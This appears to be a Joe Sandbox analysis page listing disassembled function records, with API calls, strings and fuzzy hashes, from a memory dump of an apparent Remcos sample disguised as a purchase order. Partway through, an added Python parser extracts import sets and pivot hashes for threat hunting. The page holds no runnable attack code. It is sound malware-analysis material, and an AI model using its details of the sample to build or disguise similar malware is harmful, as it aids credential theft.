                                                                                                      • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                      • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                      • API String ID: 2767993716-572158859
                                                                                                      • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                      • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                      • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                      • API String ID: 3176057301-2039793938
                                                                                                      • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                      • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
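The per-function records in this listing are what an analyst pivots on: the API set tells you which code the unpacked Remcos payload (process 6, image base 0x400000) actually calls, and the API String ID and Instruction Fuzzy Hash values can be searched across other reports. The parser below is an added example, not code from the Joe Sandbox report or its IDA plugin. Its sample input is copied from records on this page (with the rendered "Download File" link text deliberately left on one Associated line so the cleanup is exercised), and the record layout it assumes, a record starting at each "APIs" header and carrying Strings, Memory Dump Source and Similarity subsections, is only what is visible here; the sandbox's real export format is not documented on this page. The NirSoft-style marker strings passed to string_hits are a heuristic the example chooses; the page itself only reports the WebBrowserPassView Yara match.

```python
import re
from dataclasses import dataclass, field

# Record layout assumed from this page (not a documented Joe Sandbox export format).
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

# "• LoadLibraryW.KERNEL32(comctl32.dll,...), ref: 004044C3"
# "• memset.MSVCRT ref: 004082EF"
# "• Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,...), ref: 00409B9C"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
# "• out of memory, xrefs: 0042F865"
XREF_RE = re.compile(r"^•\s*(?P<s>.*), xrefs:\s*(?P<ref>[0-9A-Fa-f]+)$")
# "• API String ID: 2780580303-317687271", "• Source File: ...sdmp, Offset: 00400000, ..."
KV_RE = re.compile(r"^•\s*(?P<k>[A-Za-z ]+?):\s*(?P<v>.*)$")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # (api, module, args, ref, subcall_of)
    strings: list = field(default_factory=list)  # (string, xref)
    fields: dict = field(default_factory=dict)   # "API ID", "Instruction Fuzzy Hash", ...
    dumps: list = field(default_factory=list)    # memory dump files the record came from


def parse_records(text):
    """Split a function listing into records; tolerates empty sections and link residue."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                        # every record starts at this header
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line or line in SECTION_HEADERS:
            continue
        if m := API_RE.match(line):
            cur.apis.append((m["api"], m["mod"], m["args"] or "", m["ref"], m["sub"]))
        elif m := XREF_RE.match(line):
            cur.strings.append((m["s"], m["ref"]))
        elif m := KV_RE.match(line):
            key, val = m["k"].strip(), m["v"].strip()
            val = val.removesuffix("Download File").strip()  # rendered-page link text
            if key in ("Source File", "Associated"):
                cur.dumps.append(val.split(",")[0])         # drop ", Offset: ..." tail
            else:
                cur.fields[key] = val
    return records


def import_set(records):
    """MODULE!Api pairs called directly by the listed functions (subcall lines excluded)."""
    return sorted({f"{mod}!{api}" for r in records
                   for api, mod, _args, _ref, sub in r.apis if sub is None})


def pivot_keys(records):
    """Per record: the two values worth searching other reports for."""
    return [(r.fields.get("API String ID"), r.fields.get("Instruction Fuzzy Hash"))
            for r in records]


def string_hits(records, markers):
    """(marker, record index) for each marker found in a record's '$'-joined String ID."""
    return sorted((m, i) for i, r in enumerate(records)
                  for m in markers if m in r.fields.get("String ID", "").split("$"))


# Constructed sample: three records copied/trimmed from this page's listing.
SAMPLE = """\
APIs
• LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
• FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
• MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
• Instruction Fuzzy Hash: B001D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
APIs
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
• wcscpy.MSVCRT ref: 0040DAFB
• wcscpy.MSVCRT ref: 0040DB0B
• GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
Similarity
• API ID: PrivateProfilewcscpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 3176057301-2039793938
• Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
APIs
Strings
• out of memory, xrefs: 0042F865
• unable to open database: %s, xrefs: 0042F84E
Similarity
• API ID: memcpymemset
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records; direct imports:", import_set(recs))
    print(string_hits(recs, ("TranslatorName", "TranslatorURL", "InitCommonControlsEx")))
```

Lines tagged "Part of subcall function" are kept but flagged with the caller address, so import_set only counts APIs the listed function calls itself; otherwise the deep subcall chains in these records would inflate the import profile. The API String ID is the most useful single pivot here, since it is stable across builds that keep the same call/string mix even when the Instruction Fuzzy Hash changes.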
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • out of memory, xrefs: 0042F865
                                                                                                      • database is already attached, xrefs: 0042F721
                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                      • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                      • unable to open database: %s, xrefs: 0042F84E
                                                                                                      • database %s is already in use, xrefs: 0042F6C5
                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                      • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                      • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                      • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                      • String ID: ($d
                                                                                                      • API String ID: 1140211610-1915259565
                                                                                                      • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                      • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                      APIs
                                                                                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                      • GetLastError.KERNEL32 ref: 004178FB
                                                                                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ErrorLastLockSleepUnlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 3015003838-0
                                                                                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00407E44
                                                                                                      • memset.MSVCRT ref: 00407E5B
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                      • wcscpy.MSVCRT ref: 00407F10
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 59245283-0
                                                                                                      • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                      • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                      APIs
                                                                                                      • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                      • GetLastError.KERNEL32 ref: 0041855C
                                                                                                      • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                      • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                      • GetLastError.KERNEL32 ref: 0041858E
                                                                                                      • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                      • free.MSVCRT ref: 004185AC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                      • String ID:
                                                                                                      • API String ID: 2802642348-0
                                                                                                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                      • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                      • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                      APIs
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                      • memset.MSVCRT ref: 00413ADC
                                                                                                      • memset.MSVCRT ref: 00413AEC
                                                                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                      • memset.MSVCRT ref: 00413BD7
                                                                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                                                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                      • String ID: 3A
                                                                                                      • API String ID: 3300951397-293699754
                                                                                                      • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                      • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                      • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                      • String ID: strings
                                                                                                      • API String ID: 3166385802-3030018805
                                                                                                      • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                      • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00411AF6
                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                                                                      • wcscat.MSVCRT ref: 00411B2E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                      • String ID: AE$.cfg$General$EA
                                                                                                      • API String ID: 776488737-1622828088
                                                                                                      • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                      • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040D8BD
                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                      • memset.MSVCRT ref: 0040D906
                                                                                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
